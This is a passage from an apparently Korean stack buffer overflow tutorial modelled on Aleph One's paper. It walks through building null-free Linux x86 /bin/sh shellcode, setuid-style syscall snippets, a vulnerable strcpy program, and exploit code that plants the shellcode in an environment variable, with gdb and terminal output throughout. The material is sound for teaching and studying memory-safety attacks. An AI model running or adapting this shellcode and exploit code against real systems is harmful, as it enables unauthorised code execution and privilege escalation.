97 "\xcd\x80" /* int $0x80 */ "\xb8\x01\x00\x00\x00" /* mov $0x1,%eax */ "\xbb\x00\x00\x00\x00" /* mov $0x0,%ebx */ "\xcd\x80" /* int $0x80 */ "\xe8\xd1\xff\xff\xff/bin/sh"; /* call <start> +/bin/sh */ void main() { int *ret; ret=(int *)&ret+2; (*ret)=(int)shellcode; ~ ~ [vangelis@localhost test]$ gcc -o shellcode1 shellcode1.c shellcode1.c: In function `main': shellcode1.c:22: warning: return type of `main' is not `int' [vangelis@localhost test]$./shellcode1 sh-2.05$ 일단은쉘을띄우는데는성공했으나앞에서도살펴보았듯이 null byte(0x0) 가코드안에있어 오버플로우공격을위해서는사용될수없다. 이제 null byte 를없애주는작업이필요하다. 위의결과를살펴보면 x00 부분이나왔던곳은다음과같다 : c movb $0x0,0x7(%esi) d: c7 46 0c movl $0x0,0xc(%esi) : b8 0b mov $0xb,%eax : b mov $0x1,%eax : bb mov $0x0,%ebx 결국 shellcodemake1.c의소스를수정해야한다. 이것은 Aleph One의글중에서도이미살펴보았던부분이다. 수정내용은다음과같다 movb $0x0,0x7(%esi) xorl %eax,%eax 96

98 molv $0x0,0xc(%esi) movb %eax,0x7(%esi) movl %eax,0xc(%esi) movl $0xb,%eax movb $0xb,%al movl $0x1, %eax xorl %ebx,%ebx movl $0x0, %ebx movl %ebx,%eax inc %eax 수정한소스는이용해다시쉘코드를추출해보자. test]$ vi shellcodemake2.c #include <stdio.h> void main() { asm (" jmp callz start: popl %esi movl %esi, 0x8(%esi) xorl %eax,%eax movb %eax,0x7(%esi) movl %eax,0xc(%esi) movb $0xb,%al movl %esi, %ebx leal 0x8(%esi), %ecx leal 0xc(%esi), %edx int $0x80 xorl %ebx,%ebx movl %ebx,%eax inc %eax int $0x80 97

99 callz: call start ");.string \"/bin/sh\" ~ ~ [vangelis@localhost test]$ gdb shellcodemake2 GNU gdb 5.3 Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu"... disas main Dump of assembler code for function main: 0x <main>: push %ebp 0x <main+1>: mov %esp,%ebp 0x <main+3>: jmp 0x <callz> 0x <start>: pop %esi 0x <start+1>: mov %esi,0x8(%esi) 0x <start+4>: xor %eax,%eax 0x804843b <start+6>: mov %al,0x7(%esi) 0x804843e <start+9>: mov %eax,0xc(%esi) 0x <start+12>: mov $0xb,%al 0x <start+14>: mov %esi,%ebx 0x <start+16>: lea 0x8(%esi),%ecx 0x <start+19>: lea 0xc(%esi),%edx 0x804844b <start+22>: int $0x80 0x804844d <start+24>: xor %ebx,%ebx 0x804844f <start+26>: mov %ebx,%eax 0x <start+28>: inc %eax 0x <start+29>: int $0x80 0x <callz>: call 0x <start> 0x <callz+5>: das 0x804845a <callz+6>: bound %ebp,0x6e(%ecx) 0x804845d <callz+9>: das 0x804845e <callz+10>: jae 0x80484c8 <_fini+24> 0x <callz+12>: add %bl,0xffffffc3(%ebp) End of assembler dump. x/bx main+3 0x <main+3>: 0xeb 98

100 0x <main+4>: 0x1f 0x <start>: 0x5e 0x <start+1>: 0x89 0x <start+2>: 0x76 0x <start+3>: 0x08 0x <start+4>: 0x31 0x804843a <start+5>: 0xc0 0x804843b <start+6>: 0x88 0x804843c <start+7>: 0x46 0x804843d <start+8>: 0x07 0x804843e <start+9>: 0x89 0x804843f <start+10>: 0x46 0x <start+11>: 0x0c 0x <start+12>: 0xb0 0x <start+13>: 0x0b 0x <start+14>: 0x89 0x <start+15>: 0xf3 0x <start+16>: 0x8d 0x <start+17>: 0x4e 0x <start+18>: 0x08 0x <start+19>: 0x8d 0x <start+20>: 0x56 0x804844a <start+21>: 0x0c 99

101 0x804844b <start+22>: 0xcd 0x804844c <start+23>: 0x80 0x804844d <start+24>: 0x31 0x804844e <start+25>: 0xdb 0x804844f <start+26>: 0x89 0x <start+27>: 0xd8 0x <start+28>: 0x40 0x <start+29>: 0xcd 0x <start+30>: 0x80 0x <callz>: 0xe8 0x <callz+1>: 0xdc 0x <callz+2>: 0xff 0x <callz+3>: 0xff 0x <callz+4>: 0xff 0x <callz+5>: 0x2f : 다음은 objdump 명령을사용한경우이다. [vangelis@localhost test]$ objdump -d shellcodemake2 more shellcodemake2: file format elf32-i386 Disassembly of section.init: bc <_init>: 80482bc: 55 push %ebp 80482bd: 89 e5 mov %esp,%ebp 80482bf: 83 ec 08 sub $0x8,%esp 80482c2: e8 8d call <call_gmon_start> 80482c7: 90 nop 100

102 80482c8: e call 80483f0 <frame_dummy> 80482cd: e8 9e call < do_global_ctors_aux> 80482d2: c9 leave 80482d3: c3 ret -- 중략 <main>: : 55 push %ebp : 89 e5 mov %esp,%ebp : eb 1f jmp <callz> <start>: : 5e pop %esi : mov %esi,0x8(%esi) : 31 c0 xor %eax,%eax b: mov %al,0x7(%esi) e: c mov %eax,0xc(%esi) : b0 0b mov $0xb,%al : 89 f3 mov %esi,%ebx : 8d 4e 08 lea 0x8(%esi),%ecx : 8d 56 0c lea 0xc(%esi),%edx b: cd 80 int $0x d: 31 db xor %ebx,%ebx f: 89 d8 mov %ebx,%eax : 40 inc %eax : cd 80 int $0x <callz>: : e8 dc ff ff ff call <start> : 2f das a: e bound %ebp,0x6e(%ecx) d: 2f das e: jae 80484c8 <gcc2_compiled.+0x18> : 00 5d c3 add %bl,0xffffffc3(%ebp) 101

103 : 90 nop -- 중략 b0 <_fini>: 80484b0: 55 push %ebp 80484b1: 89 e5 mov %esp,%ebp 80484b3: 53 push %ebx 80484b4: 52 push %edx 80484b5: e call 80484ba <gcc2_compiled.+0xa> 80484ba: 5b pop %ebx 80484bb: 81 c add $0x1042,%ebx 80484c1: 8d lea 0x0(%esi),%esi 80484c4: e8 b7 fe ff ff call < do_global_dtors_aux> 80484c9: 8b 5d fc mov 0xfffffffc(%ebp),%ebx 80484cc: c9 leave 80484cd: c3 ret test]$ 이제추출한쉘코드를정리해보자 \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0 \x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8 \x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh ; 이제추출한코드를이용해쉘을실행해보자. [vangelis@localhost test]$ vi shellcode2.c char shellcode[]= void main() { \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0 \x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8 \x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh ; int *ret; 102

    ret = (int *)&ret + 2;
    (*ret) = (int)shellcode;
}
~
~
[vangelis@localhost test]$ gcc -o shellcode2 shellcode2.c
[vangelis@localhost test]$ ./shellcode2
sh-2.05$

We got a shell. Using objdump looks simpler than using gdb. These days many ways of building shellcode are in circulation. They cannot all be covered here, so I will introduce just one more and then close the shellcode section. For other shellcode construction methods, refer to the many resources available on the Internet. The following was tested on Red Hat 8.0.

[vangelis@localhost test]$ mkdir shell
[vangelis@localhost test]$ cd shell
[vangelis@localhost shell]$ vi shell.c
#include <stdio.h>
#include <unistd.h>   /* execve() */

int main()
{
    char *name[2];

    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
    return 0;
}
[vangelis@localhost shell]$ gcc -o shell shell.c

[vangelis@localhost shell]$ ./shell
sh-2.05b$
sh-2.05b$ exit
exit
[vangelis@localhost shell]$ vi shellcode.s
.section .text
.global main
main:
    xorl %eax, %eax
    xorl %ebx, %ebx
    xorl %ecx, %ecx
    xorl %edx, %edx
    pushl %edx
    pushl $0x68732f2f    /* "//sh": the extra slash only pads the string to 8 bytes; the kernel treats "//" like "/" */
    pushl $0x6e69622f    /* "/bin" */
    movl %esp, %ebx
    pushl %edx
    pushl %ebx
    movl %esp, %ecx
    movl $0xb, %eax
    int $0x80
    xorl %ebx, %ebx
    movl %ebx, %eax
    incl %eax
    int $0x80
~
~
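The two pushl constants in shellcode.s are simply the path string stored back to front. The following is a minimal sketch, not part of the original article, that rebuilds the string from the two immediates; the function name pushed_words_to_string is hypothetical and chosen only for illustration. It uses shifts rather than pointer casts, so it gives the same answer on any host.

```c
#include <stdint.h>
#include <string.h>

/* Rebuild the 8-character string that two 32-bit pushes leave on a
 * little-endian x86 stack. The stack grows downward, so the word pushed
 * last ends up at the lowest address and therefore comes first in the
 * string. Within each word the least significant byte is stored first.
 * (Hypothetical helper for illustration only.) */
void pushed_words_to_string(uint32_t pushed_first,
                            uint32_t pushed_last,
                            char out[9])
{
    const uint32_t words[2] = { pushed_last, pushed_first };

    for (int w = 0; w < 2; w++) {
        for (int b = 0; b < 4; b++) {
            out[w * 4 + b] = (char)((words[w] >> (8 * b)) & 0xff);
        }
    }
    out[8] = '\0';
}
```

Called with 0x68732f2f as pushed_first and 0x6e69622f as pushed_last, the buffer holds the path that %ebx points to after the movl %esp, %ebx instruction.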

/****** Note **************************************************************************/
0005c d e0 2F E 2F 2F /bin//sh
/**************************************************************************************/

[vangelis@localhost shell]$ gcc -o shellcode shellcode.s
[vangelis@localhost shell]$ ./shellcode
sh-2.05b$ exit
exit
[vangelis@localhost shell]$ gdb shellcode
GNU gdb Red Hat Linux ( )
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disas main
Dump of assembler code for function main:
0x80482f4 <main>:       xor %eax,%eax
0x80482f6 <main+2>:     xor %ebx,%ebx
0x80482f8 <main+4>:     xor %ecx,%ecx
0x80482fa <main+6>:     xor %edx,%edx
0x80482fc <main+8>:     push %edx
0x80482fd <main+9>:     push $0x68732f2f
0x <main+14>:           push $0x6e69622f
0x <main+19>:           mov %esp,%ebx
0x <main+21>:           push %edx
0x804830a <main+22>:    push %ebx
0x804830b <main+23>:    mov %esp,%ecx
0x804830d <main+25>:    mov $0xb,%eax
0x <main+30>:           int $0x80

0x <main+32>:           xor %ebx,%ebx
0x <main+34>:           mov %ebx,%eax
0x <main+36>:           inc %eax
0x <main+37>:           int $0x80
0x804831b <main+39>:    nop
End of assembler dump.
(gdb) x/36b main
0x80482f4 <main>:       0x31 0xc0 0x31 0xdb 0x31 0xc9 0x31 0xd2
0x80482fc <main+8>:     0x52 0x68 0x2f 0x2f 0x73 0x68 0x68 0x2f
0x <main+16>:           0x62 0x69 0x6e 0x89 0xe3 0x52 0x53 0x89
0x804830c <main+24>:    0xe1 0xb0 0x0b 0xcd 0x80 0x31 0xdb 0x89
0x <main+32>:           0xd8 0x40 0xcd 0x80
(gdb) q
[vangelis@localhost shell]$

Extracting the shellcode gives the following.

"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\x52\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x52\x53\x89"
"\xe1\xb0\x0b\xcd\x80\x31\xdb\x89"
"\xd8\x40\xcd\x80"

[vangelis@localhost shell]$ vi shellcode2.c
#include <stdio.h>

char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\x52\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x52\x53\x89"
"\xe1\xb0\x0b\xcd\x80\x31\xdb\x89"
"\xd8\x40\xcd\x80";

int main(void)

{
    int *ret;

    ret = (int *)&ret + 2;
    (*ret) = (int)shellcode;
}
~
~
[vangelis@localhost shell]$ gcc -o shellcode2 shellcode2.c
[vangelis@localhost shell]$ ./shellcode2
sh-2.05b$

We got a shell. Below is assembly code for several system calls, given for reference. The environment is a Linux kernel, gcc 3.2.2, gdb 5.3, and strace 4.4. Read these listings alongside the syscall table provided earlier, because you need it to see which value is passed in %eax.

setuid(0); - set user id

    xor %ebx, %ebx      /* argument 1, set ebx register to 0 (user_id) */
    mov $0x17, %eax     /* copy syscall number (in hex) to eax register */
    int $0x80           /* interrupt to execute syscall */

setgid(0); - set group id

    xor %ebx, %ebx      /* argument 1, set ebx register to 0 (group_id) */
    mov $0x2E, %eax     /* copy syscall number (in hex) to eax register */
    int $0x80           /* interrupt to execute syscall */

setreuid(0,0); - set real and effective user id

    xor %ebx, %ebx      /* argument 1, set ebx register to 0 (real_user_id) */
    xor %ecx, %ecx      /* argument 2, set ecx register to 0 (effective_user_id) */
    mov $0x46, %eax     /* copy syscall number (in hex) to eax register */
    int $0x80           /* interrupt to execute syscall */

setregid(0,0); - set real and effective group id

    xor %ebx, %ebx      /* argument 1, set ebx register to 0 (real_group_id) */
    xor %ecx, %ecx      /* argument 2, set ecx register to 0 (effective_group_id) */
    mov $0x47, %eax     /* copy syscall number (in hex) to eax register */
    int $0x80           /* interrupt to execute syscall */

setresuid(0,0,0); - set real, effective and saved user id

    xor %ebx, %ebx      /* argument 1, set ebx register to 0 (real_user_id) */
    xor %ecx, %ecx      /* argument 2, set ecx register to 0 (effective_user_id) */
    xor %edx, %edx      /* argument 3, set edx register to 0 (saved_user_id) */
    mov $0xA4, %eax     /* copy syscall number (in hex) to eax register */
    int $0x80           /* interrupt to execute syscall */

setresgid(0,0,0); - set real, effective and saved group id

    xor %ebx, %ebx      /* argument 1, set ebx register to 0 (real_group_id) */
    xor %ecx, %ecx      /* argument 2, set ecx register to 0 (effective_group_id) */
    xor %edx, %edx      /* argument 3, set edx register to 0 (saved_group_id) */
    mov $0xAA, %eax     /* copy syscall number (in hex) to eax register */
    int $0x80           /* interrupt to execute syscall */

write();

    xor %edx, %edx      /* set edx register to 0 */
    xor %ebx, %ebx      /* set ebx register to 0 */
    push %ebx           /* push ebx on the stack */
    push <txt>          /* push the text (converted to hex) on the stack */
    mov %esp, %ecx      /* write the address to ecx register */
    mov $0x<size>, %edx /* move the size of the text+\0 to edx register */
    mov $0x4, %eax      /* move syscall number (in hex) to eax register */
    int $0x80           /* interrupt to execute syscall */

execve();
int execve(const char *filename, char *const argv[], char *const envp[]);

    xor %eax, %eax      /* set eax register to 0 */
    push %eax           /* push eax on the stack */
    push $0x68732f2f    /* push //sh on the stack */
    push $0x6e69622f    /* push /bin on the stack */
    mov %esp, %ebx      /* write the starting address of the string to ebx register */
    push %eax           /* terminate the **argv */
    push %ebx           /* create char **argv */
    mov %esp, %ecx      /* write the address to ecx register */
    xor %edx, %edx      /* set edx register to 0 */
    mov $0xb, %eax      /* move syscall number (in hex) to eax register */
    int $0x80           /* interrupt to execute syscall */

exit(0);

    xor %ebx, %ebx      /* argument 1, set ebx register to 0 */
    mov $0x1, %eax      /* copy syscall number (in hex) to eax register */
    int $0x80           /* interrupt to execute syscall */
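Each listing above loads a number into %eax before int $0x80; that number is what selects the system call. As a small sketch of the same idea from C, assuming a Linux system with glibc, the generic syscall() entry point takes that number explicitly. The function name getpid_by_number is hypothetical. Note that the numeric values differ between architectures, so the hexadecimal constants shown in the listings apply to i386 only.

```c
#include <unistd.h>
#include <sys/syscall.h>

/* Ask the kernel for the process ID by syscall number instead of by
 * wrapper function. SYS_getpid is the architecture-specific number that
 * the getpid() wrapper places in the syscall register (%eax on i386).
 * (Hypothetical helper for illustration; Linux/glibc assumed.) */
long getpid_by_number(void)
{
    return syscall(SYS_getpid);
}
```

The value returned should match what the ordinary getpid() wrapper reports for the same process.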

Writing an Exploit (or how to mung the stack)

We now seem ready to exploit a program that has a buffer overflow vulnerability. The shellcode we built earlier becomes part of the string used to overflow the buffer. A function that does no bounds checking, such as strcpy(), accepts whatever data the attacker supplies, so the copy can run past the end of the designated buffer and overwrite the saved frame pointer and the return address. If the attacker includes shellcode in that string and makes the function return to the address of the shellcode, the attacker's code is executed. Consider the following.

[vangelis@localhost shell]$ vi overflow1.c
#include <string.h>

char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* the string that will perform the buffer overflow */
char large_string[128];

void main() {
    /* the buffer that will be overflowed */
    char buffer[96];
    /* loop variable */
    int i;
    /* long_ptr holds the start address of large_string */
    long *long_ptr = (long *) large_string;

    /* Store the start address of buffer through long_ptr. The loop runs
       32 times, so large_string[0] through large_string[127] end up
       holding &buffer[0] repeated 32 times:
       [ &buffer[0] ][ &buffer[0] ][ &buffer[0] ]... [ &buffer[0] ] */
    for (i = 0; i < 32; i++)
        *(long_ptr + i) = (int) buffer;

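    /* Copy the shellcode into the front of large_string, which ends up as:
       [ shellcode ][ &buffer[0] ][ &buffer[0] ]... [ &buffer[0] ] */
    for (i = 0; i < strlen(shellcode); i++)
        large_string[i] = shellcode[i];

    /* strcpy() copies large_string into buffer. buffer is 96 bytes long
       and large_string is 128 bytes long, so buffer overflows and the
       return address of main() is overwritten with &buffer[0].

       -=[ buffer ]=-
       [ buffer ][ main_sfp ][ main_ret ]
       -=[ large_string ]=-
       [ shellcode ][ &buffer[0] ]... [ &buffer[0] ][ &buffer[0] ]... [ &buffer[0] ]

       After strcpy() the shellcode sits at &buffer[0], so it runs when
       main() returns. */
    strcpy(buffer, large_string);
}
~
~
[vangelis@localhost shell]$ gcc -o overflow1 overflow1.c
overflow1.c: In function `main':
overflow1.c:9: warning: return type of `main' is not `int'
[vangelis@localhost shell]$ ./overflow1
sh-2.05b$

This is the result of running overflow1.c from Aleph One's article on my system. The source above is both the vulnerable program and the exploit, which is why the original names the source file overflow1.c and the compiled executable exploit1. In any case, Aleph One presents it to show the return address being overwritten with the address of the shellcode. Briefly, it works as follows. The array large_string[] is filled with the address of buffer[]. The shellcode is then copied into the beginning of large_string. strcpy() copies large_string into buffer without any bounds checking. The copy runs past the return address and overwrites it with the address where the shellcode is located. When execution reaches the end of main(), it returns to the shellcode, and a shell is executed.

No program with a flaw like this one would ever be deployed on a server, however. What ordinary program would carry shellcode? Only an attack program would. As noted above, this source is merely an example of using shellcode to overwrite the return address of a program with an overflow vulnerability. The problem we actually face is finding out at which address the buffer, and with it the shellcode, will be located.

Every problem has a solution, and the clue here is that the stack starts at the same address for every program. Most programs do not push huge amounts of data onto the stack at once. So if we know where the stack starts, we can guess where the buffer we want to overflow will be, though it may take a lot of trial and error. As discussed later, guessing the position of the buffer really does take a great many attempts, and blind guessing is no basis for methodical hacking. What we need is a program that reports the stack pointer, and sp.c below is exactly that. As mentioned earlier, the stack pointer points to the top of the stack. Once we know where the stack pointer is, locating the buffer becomes that much simpler and the trial and error shrinks accordingly. The following is the result of a test on my system. Incidentally, the user-defined function get_sp() in sp.c does not have to be called get_sp(); any other name works just as well. Whatever document you read, do not be intimidated by the source code itself.

[vangelis@localhost shell]$ vi sp.c
unsigned long get_sp(void){
    __asm__("movl %esp,%eax");
}
void main(){
    printf("0x%x\n", get_sp());
}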

~
~
[vangelis@localhost shell]$ gcc -o sp sp.c
sp.c: In function `main':
sp.c:6: warning: return type of `main' is not `int'
[vangelis@localhost shell]$ ./sp
0xbffff908

In sp.c, the part beginners are most likely to find difficult is __asm__("movl %esp,%eax");, so here is a brief explanation. To access a register, the code uses inline assembly 21, which gcc writes as __asm__(). Put simply, it lets assembler be embedded in C source code. As you probably know, Linux uses AT&T assembly syntax, the Unix convention. It is sometimes confused with Intel syntax. In Intel syntax registers carry no % prefix, and the positions of source and destination differ: in AT&T syntax the source is always on the left and the destination on the right, while Intel syntax is the reverse. With those differences in mind, the line in sp.c reads as follows.

AT&T:  movl %esp, %eax
Intel: mov eax, esp

movl %esp,%eax loads the value of the stack pointer into the eax register. Once that is done, printf("0x%x\n", get_sp()); in main() prints the stack pointer value held in eax in hexadecimal. Now let's take one more program with an overflow vulnerability and follow the process all the way to the attack.

vulnerable.c

21 For a brief introduction to inline assembly, refer to the following.

void main(int argc, char *argv[])
{
    char buffer[512];

    if (argc > 1)
        strcpy(buffer, argv[1]);
}

Even at a glance this source has a buffer overflow vulnerability. Let's analyze it, starting with main(int argc, char *argv[]). Anyone with the basics of C already knows this, but since this document is also meant for beginners, here is a short explanation. It means that strings typed on the command line are handed to main() as arguments. The arguments passed to main() are argc and argv: argc is the number of arguments, and argv is an array of pointers to the argument strings. Suppose, for example, that vulnerable.c is compiled and run with an argument as follows.

[vangelis@localhost bof]$ gcc -o vulnerable vulnerable.c
[vangelis@localhost bof]$ ./vulnerable a

argv[0] points to the file name vulnerable, and argv[1] is the first argument string, a. argc is naturally 2: vulnerable and a together make two arguments.

if (argc > 1)
    strcpy(buffer, argv[1]);

This part checks that at least one argument besides the program name was supplied (if (argc > 1)) and then copies argv[1] into buffer, whose capacity is fixed at 512 bytes. Because strcpy() does no bounds checking, it accepts everything the user supplies, and an overflow occurs if the argument is 512 bytes or longer.

Now let's look at an exploit that attacks the vulnerable program. exploit2.c, shown below, takes the buffer size and an offset from the stack pointer as parameters. For convenience, it puts the string that will overflow the buffer, that is, the shellcode, into an environment variable.

Why does putting the overflow string into an environment variable make the attack easier? To understand this we first need to look at environment variables. To see a user's environment variables, run the env command.

[vangelis@localhost bof]$ env
SSH_AGENT_PID=901
HOSTNAME=localhost.localdomain
PVM_RSH=/usr/bin/rsh
TERM=xterm
SHELL=/bin/bash
HISTSIZE=1000
JLESSCHARSET=ko
GTK_RC_FILES=/etc/gtk/gtkrc:/root/.gtkrc-1.2-gnome2
WINDOWID=
QTDIR=/usr/lib/qt3-gcc3.2
OLDPWD=/home/vangelis/test
USER=vangelis
LS_COLORS=no=00:fi=00:di=00;34:ln=00;36:pi=40;33:so=00;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=00;32:*.cmd=00;32:*.exe=00;32:*.com=00;32:*.btm=00;32:*.bat=00;32:*.sh=00;32:*.csh=00;32:*.tar=00;31:*.tgz=00;31:*.arj=00;31:*.taz=00;31:*.lzh=00;31:*.zip=00;31:*.z=00;31:*.z=00;31:*.gz=00;31:*.bz2=00;31:*.bz=00;31:*.tz=00;31:*.rpm=00;31:*.cpio=00;31:*.jpg=00;35:*.gif=00;35:*.bmp=00;35:*.xbm=00;35:*.xpm=00;35:*.png=00;35:*.tif=00;35:
SSH_AUTH_SOCK=/tmp/ssh-XX6ppeE8/agent.842
PVM_ROOT=/usr/share/pvm3
USERNAME=root
SESSION_MANAGER=local/localhost.localdomain:/tmp/.ICE-unix/842
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin
MAIL=/var/spool/mail/root
PWD=/home/vangelis/test/bof
INPUTRC=/etc/inputrc
LANG=ko_KR.eucKR
GDMSESSION=Default
SSH_ASKPASS=/usr/libexec/openssh/gnome-ssh-askpass
SHLVL=3
HOME=/home/vangelis
GNOME_DESKTOP_SESSION_ID=Default
BASH_ENV=/root/.bashrc
LOGNAME=vangelis
LESSOPEN=|/usr/bin/lesspipe.sh %s
DISPLAY=:0
G_BROKEN_FILENAMES=1

XAUTHORITY=/home/vangelis/.xauthms7oup
COLORTERM=gnome-terminal
_=/bin/env

Now let's add something new to the environment. The export command adds a new entry.

[vangelis@localhost bof]$ export wowhacker="/bin/sh"
[vangelis@localhost bof]$ echo $wowhacker
/bin/sh

The entry $wowhacker now holds /bin/sh. Let's execute $wowhacker.

[vangelis@localhost bof]$ $wowhacker
sh-2.05b$

A shell was started. Now run env to look at the actual contents of the environment.

[vangelis@localhost bof]$ env
SSH_AGENT_PID=901
HOSTNAME=localhost.localdomain
-- snip --
GNOME_DESKTOP_SESSION_ID=Default
BASH_ENV=/root/.bashrc
wowhacker=/bin/sh
LOGNAME=vangelis
LESSOPEN=|/usr/bin/lesspipe.sh %s
DISPLAY=:0
G_BROKEN_FILENAMES=1
XAUTHORITY=/home/vangelis/.xauthms7oup
COLORTERM=gnome-terminal
_=/bin/env

The output now contains the added line wowhacker=/bin/sh. For the relationship between environment variables and security, read the Secure Programming for Linux and Unix HOWTO 22.

To return to the earlier question: why does putting the overflow string into an environment variable make the attack easier? The environment holds all kinds of default values used by the system, and values stored in a user's environment are inherited by the programs that user starts. A string placed there with putenv() is therefore available in the shell started afterwards and can be handed to the vulnerable program simply as $EGG. exploit2.c and exploit3.c below both use putenv() to put the shellcode into the environment; see the man page for details of putenv(). Now let's look at the exploit that targets vulnerable.c.

[vangelis@localhost bof]$ vi exploit2.c
#include <stdlib.h>

/* default offset between the stack pointer and the buffer */
#define DEFAULT_OFFSET 0
/* default size of the buffer in the vulnerable program */
#define DEFAULT_BUFFER_SIZE 512

22 A Korean edition is also available.

char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* returns the current stack pointer value */
unsigned long get_sp(void) {
    __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
    int i;

    /* if the user supplied values, use them for the buffer size and offset */
    if (argc > 1) bsize = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);

    /* allocate memory for buff; exit on failure */
    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    /* addr, the value that will overwrite the return address, is set to
       the current stack pointer minus offset. The assumption is that the
       new shell started by system("/bin/bash") has the same (or a
       similar) virtual memory layout as the current one, so the buffer of
       the vulnerable program should be allocated about offset bytes away
       from the stack pointer seen here. addr is used as the guessed start
       address of the vulnerable program's buffer. It is hard to predict
       exactly, so the offset has to be varied by trial and error. */
    addr = get_sp() - offset;
    printf("Using address: 0x%x\n", addr);

    /* make ptr equal to buff, and point addr_ptr at the start of ptr,
       that is, the start of buff */

    ptr = buff;
    addr_ptr = (long *) ptr;

    /* fill bsize bytes through addr_ptr with the guessed start address
       (addr), so that buff holds:

       0                                           bsize
       [ addr ][ addr ][ addr ]... [ addr ] */
    for (i = 0; i < bsize; i+=4)
        *(addr_ptr++) = addr;

    /* copy the shellcode to ptr + 4, that is, &buff[0] + 4, so that buff
       holds the layout below. The first 4 bytes of buff will later
       receive the string "EGG=".

       0                                                      bsize
       [ addr ][ shellcode ][ addr ][ addr ][ addr ]... [ addr ] */
    ptr += 4;
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    /* terminate the string */
    buff[bsize - 1] = '\0';

    /* write "EGG=" into the first 4 bytes of buff and register buff as an
       environment variable with putenv(). Then start a new /bin/bash with
       system() so that EGG is part of its environment.

       0                                                      bsize
       [ EGG= ][ shellcode ][ addr ][ addr ][ addr ]... [ addr ] */
    memcpy(buff,"EGG=",4);
    putenv(buff);
    system("/bin/bash");
}
~
~
[vangelis@localhost bof]$ gcc -o exploit2 exploit2.c
exploit2.c: In function `main':

exploit2.c:15: warning: return type of `main' is not `int'
[vangelis@localhost bof]$ ./exploit2 500
Using address: 0xbffff8f8
[vangelis@localhost bof]$ ./vulnerable $EGG
[vangelis@localhost bof]$ exit
exit
[vangelis@localhost bof]$ ./exploit2 600
Using address: 0xbffff8f8
[vangelis@localhost bof]$ ./vulnerable $EGG
Segmentation fault
[vangelis@localhost bof]$ exit
exit
[vangelis@localhost bof]$ ./exploit
Using address: 0xbffff894
[vangelis@localhost bof]$ ./vulnerable $EGG
Segmentation fault
[vangelis@localhost bof]$ exit
exit
[vangelis@localhost bof]$ ./exploit
Using address: 0xbffff830
[vangelis@localhost bof]$ ./vulnerable $EGG
Segmentation fault
[vangelis@localhost bof]$ exit
exit
[vangelis@localhost bof]$ ./exploit
Using address: 0xbffff704
[vangelis@localhost bof]$ ./vulnerable $EGG
Segmentation fault
[vangelis@localhost bof]$

The first problem we faced was finding where the stack pointer starts, which is why we used sp.c. But even with the stack pointer known, attacking by guessing the offset as above is clearly far too inefficient. The remaining problem is to guess the location of the shellcode accurately; once the location of the shellcode is known, the problem is practically solved. The exploit therefore needs to be modified, and the modification is to use the NOP instruction 23. What effect does NOP have? Almost every processor has a NOP instruction. It is used to delay execution, typically for timing purposes. Let's now see how NOP can be used in an overflow attack. First, here is a list of NOP-equivalent instructions used in shellcode on various processors.

Architecture  Code (hex, 00=wild)  Opcode
HPPA          a                    xor %r1,%r1,%r26
HPPA                               xor %r1,%r2,%r3
HPPA          08 a                 or %r4,%r5,%r6
HPPA          f                    shladd %r4,2,%r8,%r15
HPPA                               sub %r9,%r8,%r7
HPPA          09 6a 02 8c          xor %r10,%r11,%r12
HPPA          09 cd 06 0f          add %r13,%r14,%r15
Sprc          20 bf bf 00          bn -random
IA32          27                   daa
IA32          2f                   das
IA32          33 c0                xor %eax,%eax
IA32          37                   aaa
IA32          3f                   aas
IA32          40                   inc %eax
IA32          41                   inc %ecx
IA32          42                   inc %edx
IA32          43                   inc %ebx
IA32          44                   inc %esp
IA32          45                   inc %ebp
IA32          46                   inc %esi
IA32          47                   inc %edi
IA32          48                   dec %eax
IA32          4a                   dec %edx
IA32          4b                   dec %ebx
IA32          4c                   dec %esp
IA32          4d                   dec %ebp
IA32          4e                   dec %esi

23 There are of course also ways to attack a program with an overflow vulnerability without using NOPs. They are beyond the scope of this article and are not covered here. They are described well in a paper published by the Netric Security Team.

IA32          4f                   dec %edi
IA32          50                   push %eax
IA32          51                   push %ecx
IA32          52                   push %edx
IA32          53                   push %ebx
